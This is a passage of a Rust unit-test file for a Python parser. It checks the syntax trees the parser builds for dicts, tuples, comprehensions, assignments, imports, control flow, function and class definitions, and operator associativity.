let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Dict {
keys: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::None,
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load }
],
values: vec![
Expression::Name { id: String::from("c"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("d"),
ctx: ExprContext::Load }
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a:c, **x, b:d}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn tuple_creation() {
let stream = Lexer::new("()\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Tuple {
elts: vec![],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("(a)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("(a,)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Tuple {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a,\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
let stream = Lexer::new("(a,b)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Tuple {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load }
],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a,b\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn list_creation() {
let stream = Lexer::new("[]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::List {
elts: vec![],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("[a]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::List {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("[a,*b,]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::List {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Starred {
value: Box::new(
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
),
ctx: ExprContext::Load
}
],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("[a,*b]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn set_creation() {
let stream = Lexer::new("{a}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Set {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a, *b,}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Set {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Starred {
value: Box::new(
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
),
ctx: ExprContext::Load
}
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a, *b}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn list_comprehension() {
let stream = Lexer::new("[a for x in y]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::ListComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
}
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("[a for x in y for g in q if True]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::ListComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
},
Comprehension::Comprehension {
target: Expression::Name { id: String::from("g"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("q"),
ctx: ExprContext::Load },
ifs: vec![
Expression::NameConstant {
value: Singleton::True
}
]
}
]
}
}
]
};
assert_eq!(ast, expected);
}
// TODO Update with proper contexts, that goes for all tests
#[test]
fn set_comprehension() {
let stream = Lexer::new("{a for x in y}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::SetComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
}
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a for x in y for g in q if True}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::SetComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
},
Comprehension::Comprehension {
target: Expression::Name { id: String::from("g"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("q"),
ctx: ExprContext::Load },
ifs: vec![
Expression::NameConstant {
value: Singleton::True
}
]
}
]
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn dict_comprehension() {
let stream = Lexer::new("{a:b for x in y}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::DictComp {
key: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
value: Box::new(
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![]
}
]
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn assignment() {
let stream = Lexer::new("a = 3\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assign {
targets: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
value: Expression::Num {
n: Number::DecInteger(String::from("3"))
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a = yield\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assign {
targets: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
value: Expression::Yield {
value: None
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a = b = c = d = 3\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assign {
targets: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("c"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("d"),
ctx: ExprContext::Load }
],
value: Expression::Num {
n: Number::DecInteger(String::from("3"))
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn annotated_assign() {
let stream = Lexer::new("a : int\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::AnnAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
annotation: Expression::Name { id: String::from("int"),
ctx: ExprContext::Load },
value: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a : int = \"hi\"\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::AnnAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
annotation: Expression::Name { id: String::from("int"),
ctx: ExprContext::Load },
value: Some(Expression::Str { s: String::from("hi") })
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn augmented_assign() {
let stream = Lexer::new("a += b; a -= b; a *= b; a @= b; a /= b; a %= b; \
a &= b; a |= b; a ^= b; a <<= b; a >>= b; a **= b; a //= b\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Add,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Sub,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Mult,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::MatMult,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Div,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Mod,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::BitAnd,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::BitOr,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::BitXor,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::LShift,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::RShift,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::Pow,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
},
Statement::AugAssign {
target: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
op: Operator::FloorDiv,
value: Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn assert() {
let stream = Lexer::new("assert condition, \"message\"\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assert {
test: Expression::Name {
id: String::from("condition"),
ctx: ExprContext::Load
},
msg: Some(Expression::Str { s: String::from("message") })
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("assert condition\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Assert {
test: Expression::Name {
id: String::from("condition"),
ctx: ExprContext::Load
},
msg: None
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn import() {
let stream = Lexer::new("import mod\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Import {
names: vec![
Alias::Alias { name: String::from("mod"), asname: None }
]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("import mod1.a.b as m, mod2\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Import {
names: vec![
Alias::Alias {
name: String::from("mod1.a.b"),
asname: Some(String::from("m"))
},
Alias::Alias { name: String::from("mod2"), asname: None }
]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn import_from() {
let stream = Lexer::new("from mod import *\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ImportFrom {
module: Some(String::from("mod")),
names: vec![
Alias::Alias { name: String::from("*"), asname: None }
],
level: 0
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("from .... mod import a,b,c as g\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ImportFrom {
module: Some(String::from("mod")),
names: vec![
Alias::Alias { name: String::from("a"), asname: None },
Alias::Alias { name: String::from("b"), asname: None },
Alias::Alias {
name: String::from("c"),
asname: Some(String::from("g"))
}
],
level: 4
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("from .... mod import (a,b,c as g,)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn if_statement() {
let stream = Lexer::new("if a:\n x;y;z\n x = 1\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::If {
test: Expression::Name {
id: String::from("a"), ctx: ExprContext::Load },
body: vec![
Statement::Expr { value: Expression::Name {
id: String::from("x"), ctx: ExprContext::Load
}},
Statement::Expr { value: Expression::Name {
id: String::from("y"), ctx: ExprContext::Load
}},
Statement::Expr { value: Expression::Name {
id: String::from("z"), ctx: ExprContext::Load
}},
Statement::Assign {
targets: vec![
Expression::Name {
id: String::from("x"), ctx: ExprContext::Load }
],
value: Expression::Num {
n: Number::DecInteger(String::from("1")) }
}
],
orelse: vec![]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("if a:\n x;y;z\n x = 1\nelif b:\n func()\n\
else:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::If {
test: Expression::Name {
id: String::from("a"), ctx: ExprContext::Load },
body: vec![
Statement::Expr { value: Expression::Name {
id: String::from("x"), ctx: ExprContext::Load
}},
Statement::Expr { value: Expression::Name {
id: String::from("y"), ctx: ExprContext::Load
}},
Statement::Expr { value: Expression::Name {
id: String::from("z"), ctx: ExprContext::Load
}},
Statement::Assign {
targets: vec![
Expression::Name {
id: String::from("x"), ctx: ExprContext::Load }
],
value: Expression::Num {
n: Number::DecInteger(String::from("1")) }
}
],
orelse: vec![
Statement::If {
test: Expression::Name {
id: String::from("b"), ctx: ExprContext::Load },
body: vec![
Statement::Expr {
value: Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![],
keywords: vec![]
}
}
],
orelse: vec![Statement::Pass]
}
]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn while_statement() {
let stream = Lexer::new("while True:\n continue\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::While {
test: Expression::NameConstant { value: Singleton::True },
body: vec![Statement::Continue],
orelse: vec![]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("while True:\n continue\nelse:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::While {
test: Expression::NameConstant { value: Singleton::True },
body: vec![Statement::Continue],
orelse: vec![Statement::Pass]
}
]
};
assert_eq!(ast, expected);
}
// TODO update with proper context (Store)
#[test]
fn for_statement() {
let stream = Lexer::new("for x in y:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::For {
// TODO ctx should be a Store
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
body: vec![Statement::Pass],
orelse: vec![]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("for x,y in a,b:\n pass\nelse:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::For {
target: Expression::Tuple {
elts: vec![
// TODO ctx's should be a Store
Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
],
ctx: ExprContext::Store
},
iter: Expression::Tuple {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load },
],
ctx: ExprContext::Load
},
body: vec![Statement::Pass],
orelse: vec![Statement::Pass]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("for x,y, in a,b,:\n pass\nelse:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn with_statement() {
let stream = Lexer::new("with a:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::With {
items: vec![
WithItem::WithItem {
context_expr: Expression::Name {
id: String::from("a"), ctx: ExprContext::Load },
optional_vars: None
}
],
body: vec![Statement::Pass]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("with a as x, b, c as z:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::With {
items: vec![
WithItem::WithItem {
context_expr: Expression::Name {
id: String::from("a"), ctx: ExprContext::Load },
optional_vars: Some(Expression::Name {
id: String::from("x"), ctx: ExprContext::Load })
},
WithItem::WithItem {
context_expr: Expression::Name {
id: String::from("b"), ctx: ExprContext::Load },
optional_vars: None
},
WithItem::WithItem {
context_expr: Expression::Name {
id: String::from("c"), ctx: ExprContext::Load },
optional_vars: Some(Expression::Name {
id: String::from("z"), ctx: ExprContext::Load })
}
],
body: vec![Statement::Pass]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn try_statement() {
let stream = Lexer::new("try:\n x\nfinally:\n fin\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Try {
body: vec![
Statement::Expr {
value: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load }
}
],
handlers: vec![],
orelse: vec![],
finalbody: vec![
Statement::Expr {
value: Expression::Name { id: String::from("fin"),
ctx: ExprContext::Load }
}
]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("try:\n x\nexcept Error as e:\n y\n\
except NewError as e:\n z\nelse:\n pass\nfinally:\n fin\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Try {
body: vec![
Statement::Expr {
value: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load }
}
],
handlers: vec![
ExceptHandler::ExceptHandler {
etype: Some(Expression::Name {
id: String::from("Error"),
ctx: ExprContext::Load
}),
name: Some(String::from("e")),
body: vec![
Statement::Expr {
value: Expression::Name {
id: String::from("y"),
ctx: ExprContext::Load
}
}
]
},
ExceptHandler::ExceptHandler {
etype: Some(Expression::Name {
id: String::from("NewError"),
ctx: ExprContext::Load
}),
name: Some(String::from("e")),
body: vec![
Statement::Expr {
value: Expression::Name {
id: String::from("z"),
ctx: ExprContext::Load
}
}
]
}
],
orelse: vec![
Statement::Pass
],
finalbody: vec![
Statement::Expr {
value: Expression::Name { id: String::from("fin"),
ctx: ExprContext::Load }
}
]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn function_def() {
let stream = Lexer::new("def func():\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
},
body: vec![
Statement::Pass
],
decorator_list: vec![],
returns: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("def func(a):\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("a"),
annotation: None
}
],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
},
body: vec![
Statement::Pass
],
decorator_list: vec![],
returns: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("def func(x,*a:q,b,c,**kwargs:name):\
\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("x"),
annotation: None
}
],
vararg: Some(Arg::Arg {
arg: String::from("a"),
annotation: Some(Expression::Name {
id: String::from("q"),
ctx: ExprContext::Load
})
}),
kwonlyargs: vec![
Arg::Arg {
arg: String::from("b"),
annotation: None
},
Arg::Arg {
arg: String::from("c"),
annotation: None
}
],
kw_defaults: vec![
Expression::None,
Expression::None
],
kwarg: Some(Arg::Arg {
arg: String::from("kwargs"),
annotation: Some(Expression::Name {
id: String::from("name"),
ctx: ExprContext::Load
})
}),
defaults: vec![]
},
body: vec![
Statement::Pass
],
decorator_list: vec![],
returns: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("def func(x,z=2,*,a:q,b,c,**kwargs:name) \
-> rtn:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("x"),
annotation: None
},
Arg::Arg {
arg: String::from("z"),
annotation: None
}
],
vararg: None,
kwonlyargs: vec![
Arg::Arg {
arg: String::from("a"),
annotation: Some(Expression::Name {
id: String::from("q"),
ctx: ExprContext::Load
})
},
Arg::Arg {
arg: String::from("b"),
annotation: None
},
Arg::Arg {
arg: String::from("c"),
annotation: None
}
],
kw_defaults: vec![
Expression::None,
Expression::None,
Expression::None
],
kwarg: Some(Arg::Arg {
arg: String::from("kwargs"),
annotation: Some(Expression::Name {
id: String::from("name"),
ctx: ExprContext::Load
})
}),
defaults: vec![
Expression::Num {
n: Number::DecInteger(String::from("2"))
}
]
},
body: vec![
Statement::Pass
],
decorator_list: vec![],
returns: Some(Expression::Name { id: String::from("rtn"),
ctx: ExprContext::Load })
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("def func(x,z=2,*,a:q,b,c,**kwargs:name,) \
-> rtn:\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn lambda_def() {
let stream = Lexer::new("lambda x,y: x+y\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Lambda {
args: Box::new(Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("x"),
annotation: None
},
Arg::Arg {
arg: String::from("y"),
annotation: None
}
],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
}),
body: Box::new(Expression::BinOp {
left: Box::new(Expression::Name {
id: String::from("x"), ctx: ExprContext::Load }),
op: Operator::Add,
right: Box::new(Expression::Name {
id: String::from("y"), ctx: ExprContext::Load })
}),
}
}
]
};
assert_eq!(ast, expected);
// lambdef_nocond test
let stream = Lexer::new("[a for x in y if lambda x,y: x+y]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::ListComp {
elt: Box::new(
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
),
generators: vec![
Comprehension::Comprehension {
target: Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
iter: Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
ifs: vec![
Expression::Lambda {
args: Box::new(Arguments::Arguments {
args: vec![
Arg::Arg {
arg: String::from("x"),
annotation: None
},
Arg::Arg {
arg: String::from("y"),
annotation: None
}
],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
}),
body: Box::new(Expression::BinOp {
left: Box::new(Expression::Name {
id: String::from("x"),
ctx: ExprContext::Load
}),
op: Operator::Add,
right: Box::new(Expression::Name {
id: String::from("y"),
ctx: ExprContext::Load
})
}),
}
]
}
]
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn class_def() {
let stream = Lexer::new("class C(base1,base2,base3):\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ClassDef {
name: String::from("C"),
bases: vec![
Expression::Name {
id: String::from("base1"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("base2"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("base3"),
ctx: ExprContext::Load
}
],
keywords: vec![],
body: vec![
Statement::Pass
],
decorator_list: vec![]
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("class C(base, key=word, **kwargs):\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ClassDef {
name: String::from("C"),
bases: vec![
Expression::Name {
id: String::from("base"),
ctx: ExprContext::Load
}
],
keywords: vec![
Keyword::Keyword {
arg: Some(String::from("key")),
value: Expression::Name {
id: String::from("word"),
ctx: ExprContext::Load
}
},
Keyword::Keyword {
arg: None,
value: Expression::Name {
id: String::from("kwargs"),
ctx: ExprContext::Load
}
}
],
body: vec![
Statement::Pass
],
decorator_list: vec![]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn decorated_defs() {
let stream = Lexer::new("@dec.a.b.c(x,y,z)\ndef func():\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::FunctionDef {
name: String::from("func"),
args: Arguments::Arguments {
args: vec![],
vararg: None,
kwonlyargs: vec![],
kw_defaults: vec![],
kwarg: None,
defaults: vec![]
},
body: vec![
Statement::Pass
],
decorator_list: vec![
Expression::Call {
func: Box::new(Expression::Attribute {
value: Box::new(Expression::Attribute {
value: Box::new(Expression::Attribute {
value: Box::new(Expression::Name {
id: String::from("dec"),
ctx: ExprContext::Load
}),
attr: String::from("a"),
ctx: ExprContext::Load
}),
attr: String::from("b"),
ctx: ExprContext::Load
}),
attr: String::from("c"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("z"),
ctx: ExprContext::Load }
],
keywords: vec![]
}
],
returns: None
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("@dec.a.b.c(x,y,z,)\n@time\nclass C(base, \
key=word, **kwargs):\n pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::ClassDef {
name: String::from("C"),
bases: vec![
Expression::Name {
id: String::from("base"),
ctx: ExprContext::Load
}
],
keywords: vec![
Keyword::Keyword {
arg: Some(String::from("key")),
value: Expression::Name {
id: String::from("word"),
ctx: ExprContext::Load
}
},
Keyword::Keyword {
arg: None,
value: Expression::Name {
id: String::from("kwargs"),
ctx: ExprContext::Load
}
}
],
body: vec![
Statement::Pass
],
decorator_list: vec![
Expression::Call {
func: Box::new(Expression::Attribute {
value: Box::new(Expression::Attribute {
value: Box::new(Expression::Attribute {
value: Box::new(Expression::Name {
id: String::from("dec"),
ctx: ExprContext::Load
}),
attr: String::from("a"),
ctx: ExprContext::Load
}),
attr: String::from("b"),
ctx: ExprContext::Load
}),
attr: String::from("c"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("y"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("z"),
ctx: ExprContext::Load }
],
keywords: vec![]
},
Expression::Name {
id: String::from("time"),
ctx: ExprContext::Load
}
]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn associativity() {
let stream = Lexer::new("1 + 2 + 3 + 4 + 5\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("2"))
})
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("3"))
})
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("4"))
})
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("5"))
})
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("1 + 2 * 3 + 4\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
